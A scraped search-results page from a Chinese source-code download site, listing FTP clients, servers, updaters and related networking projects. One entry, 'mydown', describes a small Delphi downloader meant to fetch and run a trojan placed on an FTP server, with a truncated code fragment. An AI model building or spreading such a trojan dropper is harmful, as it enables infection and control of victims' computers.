CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 Windows编程 搜索资源 - FTP implementation

搜索资源列表

  1. UpDemo

    0下载:
  2. UPDDEMO,展示了用WinInet FTP函数在第二个线程执行期间从匿名FTP服务器上下载文件的方法。-UPDDEMO. using WinInet display FTP function in the second threads implementation period from anonymous FTP server download methods.
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:8340
    • 提供者:郑森
  1. mydown

    0下载:
  2. 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadF
  3. 所属分类:网络编程

    • 发布日期:2008-10-13
    • 文件大小:1436
    • 提供者:韩冰
  1. Server_Ftp

    0下载:
  2. 利用进程通信套接字socket 的编程接口功能,设计和实现了一个简单的文件传输协议。此为FTP服务器端。-communications process using socket programming interface functions, Design and Implementation of a simple file transfer protocol. To this FTP server.
  3. 所属分类:网络编程

    • 发布日期:2008-10-13
    • 文件大小:19391
    • 提供者:wu
  1. 软件在线升级系统

    0下载:
  2. “软件在线升级系统”执行说明: 1、 光盘目录vc6.0\\chapter6\\bin\\UpgradeAtv.dll为本系统的可执行文件。在测试之前要先使用regsvr32.exe注册这个DLL。 2、 光盘目录vc6.0\\chapter6\\Pages是本系统的测试页面。 3、 光盘目录vc6.0\\chapter6\\setup是系统安装指导。 4、 光盘目录vc6.0\\chapter6\\src\\UpgradeAtv\\*.*为本系统的VC源程序。 5、 光盘目录vc6.0\\ch
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:3610775
    • 提供者:徐夕
  1. Ftp搜索工具

    0下载:
  2. 实现一个Ftp搜索工具,主要介绍了属性页控件,对指定IP执行Ping命令查看主机存活状态,扫描主机端口,打开、添加、查询和关闭数据库,IP地址控件的使用等。-achieving a search tool, mainly on the properties page controls, the implementation of a designated IP Ping order to survive View host state, scanning host ports, open, ad
  3. 所属分类:PropertySheet

    • 发布日期:2008-10-13
    • 文件大小:95138
    • 提供者:张伟
  1. c语言实现软件自动升级

    0下载:
  2. 用C及ftp实现软件自动升级。通过在服务器端建立FTP服务,实现远程主机的文件更新. 软件启动过程连接服务器,获得软件文件更新列表(此步省略),进行本地文件更新 启动过程进行系统调用执行批处理文件ftpget.bat,调用方式system( \"e:\\\\ftpget.bat\" ) 文件ftpget.bat负责连接服务器下载所需文件,并完成文件的更新-C ftp software and automatic upgrades. Through the establis
  3. 所属分类:通讯编程

    • 发布日期:2008-10-13
    • 文件大小:1185
    • 提供者:lll
  1. ftpsourcecode

    0下载:
  2. ftp 源码,包括服务端和客户端,在window上实现-ftp source code, including server and client, in the window on the implementation
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-24
    • 文件大小:70530
    • 提供者:liujun
  1. 2

    0下载:
  2. The proxy project is an implementation of an HTTP, FTP and SOCKS proxy server and PortMap server.
  3. 所属分类:Communication

    • 发布日期:2017-04-08
    • 文件大小:267342
    • 提供者:tiamo
  1. ftp

    0下载:
  2. 用Csharp实现的FTP代码,具体说明请见代码-FTP implementation with Csharp code, see the code to specify
  3. 所属分类:CSharp

    • 发布日期:2017-03-28
    • 文件大小:543207
    • 提供者:caozhiwen
  1. winsock_ftp_client

    0下载:
  2. winsock实现ftp服务器 基于标准的FPT协议,tcp/ip协议-winsock implementation ftp server
  3. 所属分类:CSharp

    • 发布日期:2017-04-05
    • 文件大小:46468
    • 提供者:郭德凯
  1. ftp

    0下载:
  2. 解析ftp协议。实现功能。我觉得很好。网络作业非常实用啊。-Resolution ftp protocol. Implementation features. I feel very good. Operation of the network is very useful ah.
  3. 所属分类:Console

    • 发布日期:2017-03-28
    • 文件大小:172204
    • 提供者:zhengliang
  1. 11.017-PB-FTP

    0下载:
  2. 用WinSock实现文件上传,不用控件,使用WinSock.PB11.5下测试成功。-File upload using WinSock implementation, not control, use WinSock.PB11.5 successfully tested.
  3. 所属分类:Other windows programs

    • 发布日期:2017-03-31
    • 文件大小:124339
    • 提供者:老韩
  1. FTP-client-implementation

    0下载:
  2. FTP client端,包括双向,传输速度,主动被动,bit/字节等模式。C语言。-The FTP client, including bi-directional transmission speed, active and passive, bit/byte modes. C language.
  3. 所属分类:Other systems

    • 发布日期:2017-04-14
    • 文件大小:5912
    • 提供者:wendy
  1. WindowsTest

    0下载:
  2. 实现FTP的实例。实 现FTP的实例。-Implementation examples of FTP. Implementation examples of FTP. Implementation examples of FTP.
  3. 所属分类:CSharp

    • 发布日期:2017-05-01
    • 文件大小:707258
    • 提供者:123
  1. ftp-tool-mfc-implementation-code

    0下载:
  2. ftp工具 mfc实现源码(学习使用的简单版本)-The FTP tool to achieve MFC source code (simple version of learning to use) The FTP tool to achieve MFC source code (simple version of learning to use)
  3. 所属分类:Dialog_Window

    • 发布日期:2017-05-26
    • 文件大小:9467904
    • 提供者:何鹏飞
  1. FTP

    0下载:
  2. c语言来模拟FTP服务器与客户端的实现,实现客户端与FTP服务器通信。(C language to simulate the implementation of FTP server and client, to achieve client and FTP server communication.)
  3. 所属分类:其他

    • 发布日期:2017-12-22
    • 文件大小:868352
    • 提供者:123qw
  1. ftp-copy

    0下载:
  2. FTP协议的简单实现,从客户端可以获得服务器端指定的文件夹信息(FTP protocol simple implementation, from the client can get the server specified folder information)
  3. 所属分类:其他

    • 发布日期:2017-12-19
    • 文件大小:18432
    • 提供者:乐乐-712
  1. FTPclient

    0下载:
  2. 使用QT5 实现的FTP工具,里面还有tcp通信。实现的功能是局域网文件传输,可自定义传输控制协议(Using QT5 implementation of the FTP tool, there are TCP communications. The realization of the function is LAN file transfer, you can customize the transmission control protocol)
  3. 所属分类:Windows编程

    • 发布日期:2018-11-14
    • 文件大小:37484750
    • 提供者:xiaolihehehe
  1. vcftp_src

    0下载:
  2. VC使用C/C++实现FTP上传、下载功能(VC implementation of the FTP function)
  3. 所属分类:其他

    • 发布日期:2017-12-30
    • 文件大小:132096
    • 提供者:龙_哥
  1. ftp客户端

    1下载:
  2. 简单Ftp客户端的实现 在WINDOWS环境下,使用VC++开发工具开发的一个FTP客户端软件。(Simple Ftp client implementation In the WINDOWS environment, an FTP client software developed using VC++ development tools.)
  3. 所属分类:Windows编程

    • 发布日期:2019-12-17
    • 文件大小:2910208
    • 提供者:李俊贤22
« 12 3 »
搜珍网 www.dssz.com